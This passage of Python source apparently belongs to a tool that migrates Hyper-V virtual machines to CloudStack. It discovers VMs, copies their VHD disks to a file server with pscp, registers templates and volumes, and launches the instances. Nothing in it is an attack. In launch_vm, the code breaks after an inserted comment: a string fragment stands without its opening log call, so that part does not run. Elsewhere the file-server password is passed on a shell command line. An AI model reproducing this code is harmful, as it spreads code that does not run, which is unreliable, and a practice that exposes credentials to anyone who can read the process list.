'vm_order'))\r\n\t\telse:\r\n\t\t\torder = []\r\n\r\n\t\twith open(self.confMgr.get('HYPERVISOR', 'log_file'), 'a') as f:\r\n\t\t\tf.write('\\n\\nDISCOVERING HYPERV...\\n')\r\n\r\n\t\tdiscovered = [] # vms of this discovery. we will remove the vm's from 'vms' later if they are not in this array.\r\n\r\n\t\tvm_input = {}\r\n\r\n\t\tself.log.info('\\n-----------------------\\n-- discovering vms... --\\n-----------------------')\r\n\t\t# collect data about the VMs from HyperV and populate a list of VMs\r\n\t\tHypervHost = 'HYPERV1'\r\n\t\tobjs, ok = hyperv.powershell('Get-VM -Server \"%s\" ' % (HypervHost))\r\n\t\tif objs and ok: \r\n\t\t\t# self.log.info('\\nGETTING VM INFO %s\\n%s' % (vm_in['hyperv_vm_name'], '----------'+'-'*len(vm_in['hyperv_vm_name'])))\r\n\t\t\tfor hypervObj in objs: # loop through the vms in the file\r\n\t\t\t\tvm_in = {}\r\n\t\t\t\tself.log.info(hypervObj)\r\n\t\t\t\tvm_in['hyperv_server'] = HypervHost\r\n\t\t\t\tvm_in['hyperv_vm_name'] = hypervObj['ElementName']\r\n\t\t\t\tvm_id = hashlib.sha1(vm_in['hyperv_server']+\"|\"+vm_in['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tself.log.info(\"............vm_id is %s\" % vm_id)\r\n\t\t\t\tif vm_id not in order:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in order %s\" % (vm_id, order))\r\n\t\t\t\t\torder.append(vm_id)\r\n\t\t\t\tif vm_id not in vms:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in vms %s\" % (vm_id, vms))\r\n\t\t\t\t\tvms[vm_id] = {}\r\n\r\n\t\t\t\tvms[vm_id].update(self.get_vm_info(vm_id, vm_in, hypervObj))\r\n\t\t\t\tdiscovered.append(vm_id)\r\n\t\t\t\t\t\t\r\n\t\t# loop through the 'vms' and remove any that were not discovered in this pass...\r\n\t\tfor vm_id in vms.keys():\r\n\t\t\tif vm_id not in discovered:\r\n\t\t\t\tdel vms[vm_id] # no longer a valid VM, so remove it...\r\n\t\t\t\tif vm_id in order: # remove the vm from the order list as well if it exists...\r\n\t\t\t\t\torder.remove(vm_id)\r\n\r\n\t\t### Update the running-hyperv.conf file\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'vm_order', order)], True)\r\n\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\treturn vms, order\r\n\r\n\tdef discover_vms_from_input_files(self):\r\n\t\tself.confMgr.refresh()\r\n\t\tif self.confMgr.has_option('STATE', 'vms'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\telse:\r\n\t\t\tvms = {}\r\n\r\n\t\tif self.confMgr.has_option('STATE', 'vm_order'):\r\n\t\t\torder = json.loads(self.confMgr.get('STATE', 'vm_order'))\r\n\t\telse:\r\n\t\t\torder = []\r\n\r\n\t\twith open(self.confMgr.get('HYPERVISOR', 'log_file'), 'a') as f:\r\n\t\t\tf.write('\\n\\nDISCOVERING HYPERV...\\n')\r\n\r\n\t\tdiscovered = [] # vms of this discovery. we will remove the vm's from 'vms' later if they are not in this array.\r\n\r\n\t\tvm_input = {}\r\n\t\tif os.path.exists(self.confMgr.get('HYPERVISOR', 'migration_input_file')):\r\n\t\t\twith open(self.confMgr.get('HYPERVISOR', 'migration_input_file'), 'r') as f:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tvm_input = json.load(f)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tself.log.info(sys.exc_info())\r\n\t\t\t\t\tsys.exit(\"Error in the formatting of '%s'\" % (self.confMgr.get('HYPERVISOR', 'migration_input_file')))\r\n\r\n\t\tself.log.info('\\n-----------------------\\n-- discovering vms... 
--\\n-----------------------')\r\n\t\t# collect data about the VMs from HyperV and populate a list of VMs\r\n\r\n\t\tif vm_input: # make sure there is data in the file\r\n\t\t\tfor vm_key in vm_input: # loop through the vms in the file\r\n\t\t\t\tvm_in = vm_input[vm_key]\r\n\t\t\t\tself.log.info(vm_in)\r\n\t\t\t\tvm_id = hashlib.sha1(vm_in['hyperv_server']+\"|\"+vm_in['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tself.log.info(\"............vm_id is %s\" % vm_id)\r\n\t\t\t\tif vm_id not in order:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in order %s\" % (vm_id, order))\r\n\t\t\t\t\torder.append(vm_id)\r\n\t\t\t\tif vm_id not in vms:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in vms %s\" % (vm_id, vms))\r\n\t\t\t\t\tvms[vm_id] = {}\r\n\r\n\t\t\t\tvms[vm_id].update(self.get_vm_info(vm_id, vm_in, None))\r\n\t\t\t\tdiscovered.append(vm_id)\r\n\t\t\t\t\t\t\r\n\t\t# loop through the 'vms' and remove any that were not discovered in this pass...\r\n\t\tfor vm_id in vms.keys():\r\n\t\t\tif vm_id not in discovered:\r\n\t\t\t\tdel vms[vm_id] # no longer a valid VM, so remove it...\r\n\t\t\t\tif vm_id in order: # remove the vm from the order list as well if it exists...\r\n\t\t\t\t\torder.remove(vm_id)\r\n\r\n\t\t### Update the running-hyperv.conf file\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'vm_order', order)], True)\r\n\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\treturn vms, order\r\n\r\n\r\n\t# copy vhd files to the file server\r\n\tdef copy_vhd_to_file_server(self, vhd_path, vhd_name):\r\n\t\treturn hyperv.powershell('%s -l %s -pw %s \"%s\" %s:%s/%s' % (\r\n\t\t\tself.confMgr.get('HYPERVISOR', 'pscp_exe'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'username'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'password'),\r\n\t\t\tvhd_path,\r\n\t\t\tself.confMgr.get('FILESERVER', 'host'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'files_path'),\r\n\t\t\tvhd_name\r\n\t\t))\r\n\r\n\r\n\tdef export_vm(self, vm_id):\r\n\t\tself.log.info('\\n-----------------------\\n-- RUNNING VM EXPORT --\\n-----------------------')\r\n\t\tself.confMgr.refresh()\r\n\t\tif not self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tself.log.info('EXPORTING %s' % (vms[vm_id]['src_name']))\r\n\t\t\tvms[vm_id]['clean_name'] = re.sub('[^0-9a-zA-Z]+', '-', vms[vm_id]['src_name']).strip('-')\r\n\r\n\t\t\t# make sure the minimum fields were entered and they have not been processed already\r\n\t\t\texported = False # initialized up front so the checks further down never hit an unbound name\r\n\r\n\t\t\tif vms[vm_id]['state'] == 'running' or vms[vm_id]['state'] == 'stopped':\r\n\t\t\t\tfor disk in vms[vm_id]['src_disks']:\r\n\t\t\t\t\tif 'label' in disk and disk['label'] == 'Hard Drive' and 'path' in disk:\r\n\t\t\t\t\t\tself.log.info('Copying drive %s' % (disk['path']))\r\n\t\t\t\t\t\tresult, ok = self.copy_vhd_to_file_server(disk['path'], ntpath.split(disk['path'])[1].replace(' ', '-'))\r\n\t\t\t\t\t\tif ok:\r\n\t\t\t\t\t\t\tself.log.info('Finished copy...')\r\n\t\t\t\t\t\t\texported = True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tself.handleError('Copy failed...')\r\n\t\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.log.info('Disk has no label/path (DriveName/DiskImage) field or its label is not Hard Drive: %s' % (disk))\r\n
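\t\t\t# For illustration (hypothetical values), copy_vhd_to_file_server shells out to pscp roughly as:\r\n\t\t\t#   C:\pscp.exe -l fsuser -pw secret \"D:\VMs\web 01.vhd\" fileserver:/files/web-01.vhd\r\n\t\t\t# i.e. the quoted source path keeps its spaces while the uploaded file name has been dashed.\r\n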
\r\n\r\n\t\t\t# bring the machines back up that were running now that we copied their disks\r\n\t\t\tif vms[vm_id]['state'] == 'running':\r\n\t\t\t\tstatus, ok = hyperv.powershell('Start-VM -VM \"%s\" -Server \"%s\" -Wait -Force' % (vms[vm_id]['hyperv_vm_name'], vms[vm_id]['hyperv_server']))\r\n\t\t\t\tif ok:\r\n\t\t\t\t\tself.log.info('Re-Started VM %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.handleError('Failed to restart the server.')\r\n\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\tif exported:\r\n\t\t\t\tself.log.info('Finished exporting %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'exported'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\tself.log.info(\"\\nCurrent VM Objects:\")\r\n\t\tself.log.info(vms[vm_id])\r\n\r\n\tdef import_vm(self, vm_id):\r\n\t\tself.log.info('\\n\\n-----------------------\\n-- RUNNING VM IMPORT --\\n-----------------------')\r\n\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\tself.log.info(\"migrationState is: %s\" % (vms[vm_id]['migrationState']))\r\n\t\tif vms[vm_id]['migrationState'] == 'exported':\r\n\t\t\tself.log.info('IMPORTING %s\\n%s' % (vms[vm_id]['hyperv_vm_name'], '----------'+'-'*len(vms[vm_id]['hyperv_vm_name'])))\r\n\t\t\timported = False\r\n\r\n\t\t\t## setup the cloudstack details we know (or are using defaults for)\r\n\t\t\t# we always have cs_zone... and this is not there in the vmware migrate, so we will retire this for now\r\n\t\t\t# if 'cs_zone' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_zone'):\r\n\t\t\t# \tvms[vm_id]['cs_zone'] = self.confMgr.get('CLOUDSTACK', 'default_zone')\r\n\t\t\t# \tzone = cs.request(dict({'command':'listZones', 'id':vms[vm_id]['cs_zone']}))\r\n\t\t\t# \tif zone and 'zone' in zone and len(zone['zone']) > 0:\r\n\t\t\t# \t\tif zone['zone'][0]['networktype'] == 'Basic':\r\n\t\t\t# \t\t\tvms[vm_id]['cs_zone_network'] = 'basic'\r\n\t\t\t# \t\telse:\r\n\t\t\t# \t\t\tvms[vm_id]['cs_zone_network'] = 'advanced'\r\n\r\n\t\t\tif 'cs_domain' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_domain'):\r\n\t\t\t\tvms[vm_id]['cs_domain'] = self.confMgr.get('CLOUDSTACK', 'default_domain')\r\n\r\n\t\t\tif 'cs_account' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_account'):\r\n\t\t\t\tvms[vm_id]['cs_account'] = self.confMgr.get('CLOUDSTACK', 'default_account')\r\n\r\n\t\t\tif 'cs_network' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_network'):\r\n\t\t\t\tvms[vm_id]['cs_network'] = self.confMgr.get('CLOUDSTACK', 'default_network')\r\n\r\n\t\t\t# if 'cs_additional_networks' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'additional_networks'):\r\n\t\t\t# \tvms[vm_id]['cs_additional_networks'] = self.confMgr.get('CLOUDSTACK', 'additional_networks')\r\n\r\n\t\t\tif 'cs_service_offering' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_service_offering'):\r\n\t\t\t\tvms[vm_id]['cs_service_offering'] = self.confMgr.get('CLOUDSTACK', 'default_service_offering')\r\n\r\n\r\n\t\t\t# make sure we have a complete config before we start\r\n\t\t\tif ('cs_zone' in vms[vm_id] and 'cs_domain' in vms[vm_id] and 'cs_account' in vms[vm_id] and 'cs_network' in vms[vm_id] and 'cs_service_offering' in vms[vm_id]):\r\n\t\t\t\t# manage the disks\r\n\t\t\t\tif 'src_disks' in vms[vm_id] and len(vms[vm_id]['src_disks']) > 0:\r\n\t\t\t\t\t# register the first 
disk as a template since it is the root disk\r\n\t\t\t\t\tself.log.info('Creating template for root volume \\'%s\\'...' % (vms[vm_id]['src_disks'][0]['name']))\r\n\t\t\t\t\ttemplate = cs.request(dict({\r\n\t\t\t\t\t\t'command':'registerTemplate',\r\n\t\t\t\t\t\t'name':vms[vm_id]['src_disks'][0]['name'].replace(' ', '-'),\r\n\t\t\t\t\t\t'displaytext':vms[vm_id]['src_disks'][0]['name'],\r\n\t\t\t\t\t\t'format':'VHD',\r\n\t\t\t\t\t\t'hypervisor':'Hyperv',\r\n\t\t\t\t\t\t'ostypeid':'138', # None\r\n\t\t\t\t\t\t'url':vms[vm_id]['src_disks'][0]['url'],\r\n\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t}))\r\n\t\t\t\t\tif template:\r\n\t\t\t\t\t\tself.log.info('Template \\'%s\\' created...' % (template['template'][0]['id']))\r\n\t\t\t\t\t\tvms[vm_id]['cs_template_id'] = template['template'][0]['id']\r\n\t\t\t\t\t\timported = True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('CLOUDSTACK', 'log_file')))\r\n\r\n\t\t\t\t\t# check if there are data src_disks\r\n\t\t\t\t\tif len(vms[vm_id]['src_disks']) > 1:\r\n\t\t\t\t\t\t# upload the remaining src_disks as volumes\r\n\t\t\t\t\t\tfor disk in vms[vm_id]['src_disks'][1:]:\r\n\t\t\t\t\t\t\timported = False # reset because we have more to do...\r\n\t\t\t\t\t\t\tself.log.info('Uploading data volume \\'%s\\'...' % (disk['name']))\r\n\t\t\t\t\t\t\tvolume = cs.request(dict({\r\n\t\t\t\t\t\t\t\t'command':'uploadVolume',\r\n\t\t\t\t\t\t\t\t'name':disk['name'].replace(' ', '-'),\r\n\t\t\t\t\t\t\t\t'format':'VHD',\r\n\t\t\t\t\t\t\t\t'url':disk['url'],\r\n\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t}))\r\n\t\t\t\t\t\t\tif volume and 'jobresult' in volume and 'volume' in volume['jobresult']:\r\n\t\t\t\t\t\t\t\tvolume_id = volume['jobresult']['volume']['id']\r\n\t\t\t\t\t\t\t\tself.log.info('Volume \\'%s\\' uploaded...' % (volume_id))\r\n\t\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id]:\r\n\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_volumes'].append(volume_id)\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_volumes'] = [volume_id]\r\n\t\t\t\t\t\t\t\timported = True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('CLOUDSTACK', 'log_file')))\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('We are missing settings fields for %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\r\n\t\t\tif imported:\r\n\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'imported'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t# run the actual migration\r\n\tdef launch_vm(self, vm_id):\r\n\t\tself.log.info('\\n\\n----------------------------\\n-- LAUNCHING IMPORTED VMS --\\n----------------------------')\r\n\t\t# go through the imported VMs and start them and attach their volumes if they have any\r\n\t\tself.confMgr.refresh()\r\n\t\tif not self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tif vms[vm_id]['migrationState'] != 'imported':\r\n
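\t\t\t\t# migrationState moves '' -> 'exported' -> 'imported' -> 'launched' -> 'migrated'\r\n\t\t\t\t# (see do_migration below), so anything short of 'imported' cannot be launched yet.\r\n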
Skipping the launch process...\" % vm_id)\r\n\t\t\t\treturn\r\n\t\t\tself.log.info('LAUNCHING %s' % (vms[vm_id]['clean_name']))\r\n\t\t\tpoll = 1\r\n\t\t\thas_error = False\r\n\t\t\tself.log.info(\"migrationState is: %s\" % (vms[vm_id]['migrationState']))\r\n\t\t\twhile not has_error and vms[vm_id]['migrationState'] != 'launched':\r\n\t\t\t\t# for i, vm in enumerate(vms):\r\n\t\t\t\t# vm_id = hashlib.sha1(vm['hyperv_server']+\"|\"+vm['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tisAVm = 'cs_service_offering' in vms[vm_id]\r\n\t\t\t\tself.log.info(\"__________%s is a vm: %s________________________\" % (vm_id, isAVm))\r\n\t\t\t\tif 'cs_service_offering' in vms[vm_id]:\r\n\t\t\t\t\tself.log.info(\"__________processing vm: %s________________________\" % vm_id)\r\n\t\t\t\t\t# check if the template has finished downloading...\r\n\t\t\t\t\ttemplate = cs.request(dict({\r\n\t\t\t\t\t\t'command':'listTemplates', \r\n\t\t\t\t\t\t'listall':'true', \r\n\t\t\t\t\t\t'templatefilter':'self', \r\n\t\t\t\t\t\t'id':vms[vm_id]['cs_template_id']\r\n\t\t\t\t\t}))\r\n\t\t\t\t\tif template and 'template' in template and len(template['template']) > 0:\r\n\t\t\t\t\t\tif template['template'][0]['isready']: # template is ready\r\n\t\t\t\t\t\t\tvolumes_ready = True\r\n\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id] and len(vms[vm_id]['cs_volumes']) > 0: # check if volumes are ready\r\n\t\t\t\t\t\t\t\tfor volume_id in vms[vm_id]['cs_volumes']:\r\n\t\t\t\t\t\t\t\t\tvolume = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'listVolumes', \r\n\t\t\t\t\t\t\t\t\t\t'listall':'true', \r\n\t\t\t\t\t\t\t\t\t\t'id':volume_id\r\n\t\t\t\t\t\t\t\t\t}))\r\n\t\t\t\t\t\t\t\t\tif volume and 'volume' in volume and len(volume['volume']) > 0:\r\n\t\t\t\t\t\t\t\t\t\t# check the state of the volume\r\n\t\t\t\t\t\t\t\t\t\tif volume['volume'][0]['state'] != 'Uploaded' and volume['volume'][0]['state'] != 'Ready':\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('%s: %s is waiting for volume \\'%s\\', current state: %s' % \r\n\t\t\t\t\t\t\t\t\t\t\t\t(poll, vms[vm_id]['hyperv_vm_name'], volume['volume'][0]['name'], volume['volume'][0]['state']))\r\n\t\t\t\t\t\t\t\t\t\t\tvolumes_ready = False\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tvolumes_ready = volumes_ready and True # propogates False if any are False\r\n\t\t\t\t\t\t\t# everything should be ready for this VM to be started, go ahead...\r\n\t\t\t\t\t\t\tif volumes_ready:\r\n\t\t\t\t\t\t\t\tself.log.info('%s: %s is ready to launch...' % (poll, vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t\t\t\t\tself.log.info('Launching VM \\'%s\\'...' 
% (vms[vm_id]['hyperv_vm_name'].replace(' ', '-')))\r\n\t\t\t\t\t\t\t\t# create a VM instance using the template\r\n\t\t\t\t\t\t\t\trequestedIpAddress = vms[vm_id].get('cs_ip_address') # may be absent when no static IP was requested\r\n\t\t\t\t\t\t\t\tif (requestedIpAddress and len(requestedIpAddress.strip()) > 0):\r\n\t\t\t\t\t\t\t\t\tcmd = dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'deployVirtualMachine',\r\n\t\t\t\t\t\t\t\t\t\t'displayname':vms[vm_id]['hyperv_vm_name'].replace(' ', '-').replace('_', '-'),\r\n\t\t\t\t\t\t\t\t\t\t'templateid':vms[vm_id]['cs_template_id'],\r\n\t\t\t\t\t\t\t\t\t\t'serviceofferingid':vms[vm_id]['cs_service_offering'],\r\n\t\t\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t\t\t'ipaddress':requestedIpAddress,\r\n\t\t\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t\t\t})\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tcmd = dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'deployVirtualMachine',\r\n\t\t\t\t\t\t\t\t\t\t'displayname':vms[vm_id]['hyperv_vm_name'].replace(' ', '-').replace('_', '-'),\r\n\t\t\t\t\t\t\t\t\t\t'templateid':vms[vm_id]['cs_template_id'],\r\n\t\t\t\t\t\t\t\t\t\t'serviceofferingid':vms[vm_id]['cs_service_offering'],\r\n\t\t\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t\t\t})\r\n\r\n\t\t\t\t\t\t\t\t# if vms[vm_id]['cs_zone_network'] == 'advanced': # advanced: so pass the networkids too\r\n\t\t\t\t\t\t\t\tif 'cs_network' in vms[vm_id] and vms[vm_id]['cs_network'] != '':\r\n\t\t\t\t\t\t\t\t\t# all_networkIds = [vms[vm_id]['cs_network'], vms[vm_id]['cs_additional_networks']]\r\n\t\t\t\t\t\t\t\t\tall_networkIds = vms[vm_id]['cs_network']\r\n\t\t\t\t\t\t\t\t\tif not isinstance(all_networkIds, list): # a single id arrives as a plain string; joining it directly would comma-split its characters\r\n\t\t\t\t\t\t\t\t\t\tall_networkIds = [all_networkIds]\r\n\t\t\t\t\t\t\t\t\tcmd['networkids'] = \",\".join(all_networkIds)\r\n\t\t\t\t\t\t\t\t\tself.log.info(\"_____networks: %s_________\" % cmd['networkids'])\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tcs_vm = cs.request(cmd) # launch the VM\r\n\t\t\t\t\t\t\t\tif cs_vm and 'jobresult' in cs_vm and 'virtualmachine' in cs_vm['jobresult']:\r\n\t\t\t\t\t\t\t\t\t# attach the data volumes to it if there are data volumes\r\n\t\t\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id] and len(vms[vm_id]['cs_volumes']) > 0:\r\n\t\t\t\t\t\t\t\t\t\tfor volume_id in vms[vm_id]['cs_volumes']:\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('Attaching vol:%s to vm:%s ...' 
% (volume_id, cs_vm['jobresult']['virtualmachine']['id']))\r\n\t\t\t\t\t\t\t\t\t\t\tattach = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t\t'id':volume_id,\r\n\t\t\t\t\t\t\t\t\t\t\t'command':'attachVolume',\r\n\t\t\t\t\t\t\t\t\t\t\t'virtualmachineid':cs_vm['jobresult']['virtualmachine']['id']\r\n\t\t\t\t\t\t\t\t\t\t\t}))\r\n\r\n\t\t\t\t\t\t\t\t\t\t\tif attach and 'jobstatus' in attach and attach['jobstatus']:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.log.info('Successfully attached volume %s' % (volume_id))\r\n\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError('Failed to attach volume %s' % (volume_id))\r\n\t\t\t\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.updateOptions([('STATE', 'migrate_error', 'True')])\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.updateVms(vms)\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\t\t\t\t\t\t\t\t\tif not has_error:\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('Rebooting the VM to make the attached volumes visible...')\r\n\t\t\t\t\t\t\t\t\t\t\treboot = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t\t\t'command':'rebootVirtualMachine', \r\n\t\t\t\t\t\t\t\t\t\t\t\t'id':cs_vm['jobresult']['virtualmachine']['id']}))\r\n\t\t\t\t\t\t\t\t\t\t\tif reboot and 'jobstatus' in reboot and reboot['jobstatus']:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.log.info('VM rebooted')\r\n\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError('VM did not reboot. Check the VM to make sure it came up correctly.')\r\n\t\t\t\t\t\t\t\t\tif not has_error:\r\n\t\t\t\t\t\t\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\t\t\t\t\t\t\tself.confMgr.refresh() # make sure we have everything from this file already\r\n\t\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_vm_id'] = cs_vm['jobresult']['virtualmachine']['id']\r\n\t\t\t\t\t\t\t\t\t\tvms[vm_id]['migrationState'] = 'launched'\r\n\t\t\t\t\t\t\t\t\t\tif (requestedIpAddress):\r\n\t\t\t\t\t\t\t\t\t\t\tlaunchedIpAddress = cs_vm['jobresult']['virtualmachine']['nic'][0]['ipaddress']\r\n\t\t\t\t\t\t\t\t\t\t\tprint(\"IP address %s:%s ==> %s:%s. \" % (vm_id, requestedIpAddress, vms[vm_id]['cs_vm_id'], launchedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info(\"IP address %s:%s ==> %s:%s. \" % (vm_id, requestedIpAddress, vms[vm_id]['cs_vm_id'], launchedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\t\tif (launchedIpAddress != requestedIpAddress):\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError(\"VM %s is launched with IP address: %s (not with %s)\" % (vms[vm_id]['cs_vm_id'], launchedIpAddress, requestedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\tself.updateVms(vms)\r\n\t\t\t\t\t\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\t\t\t\t\t\t\telif cs_vm and 'jobresult' in cs_vm and 'errortext' in cs_vm['jobresult']:\r\n\t\t\t\t\t\t\t\t\tself.handleError('%s failed to start! ERROR: %s' % (vms[vm_id]['hyperv_vm_name'], cs_vm['jobresult']['errortext']))\r\n\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tself.handleError('%s did not Start or Error correctly...' 
% (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif ('status' in template['template'][0]):\r\n\t\t\t\t\t\t\tself.log.info('%s: %s is waiting for template, current state: %s' % (poll, vms[vm_id]['clean_name'], template['template'][0]['status']))\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\tself.handleError('%s: %s is waiting for template, current state not known.' % (poll, vms[vm_id]['clean_name']))\r\n\t\t\t\t\t\t\tself.handleError(template['template'][0])\r\n\r\n\t\t\t\tif vms[vm_id]['migrationState'] != 'launched':\r\n\t\t\t\t\tself.log.info('... polling ...')\r\n\t\t\t\t\tpoll = poll + 1\r\n\t\t\t\t\ttime.sleep(10)\r\n\t\t\tif not has_error: # complete the migration...\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\t\t# save the updated state\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'migrated'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tmigrate = json.loads(self.confMgr.get('STATE', 'migrate'))\r\n\t\t\t\tmigrate.remove(vm_id)\r\n\t\t\t\tself.confMgr.updateOptions([('STATE', 'migrate', migrate)])\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\t\t\tself.log.info('SUCCESSFULLY MIGRATED %s to %s\\n\\n' % (vms[vm_id]['src_name'], vms[vm_id]['clean_name']))\r\n\t\telse:\r\n\t\t\tself.log.info('An error has occurred. Skipping the launch process...')\r\n\r\n# vms[i]['migrationState'] = 'launched'\r\n\t\t### clean up the running-hyperv.conf file...\r\n\t\t#os.remove('./running-hyperv.conf')\r\n\r\n\tdef handleError(self, e):\r\n\t\tself.commonService.handleError(e)\r\n\r\n\t# run the actual migration\r\n\tdef do_migration(self):\r\n\t\ttry:\r\n\t\t\tself.commonService.beforeMigrationSetup()\r\n\t\t\tself.confMgr.refresh()\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tmigrate = json.loads(self.confMgr.get('STATE', 'migrate'))\r\n\t\t\tfor vm_id in migrate[:]: # makes a copy of the list so we can delete from the original\r\n\t\t\t\tself.log.info(\"starting migration for %s. 
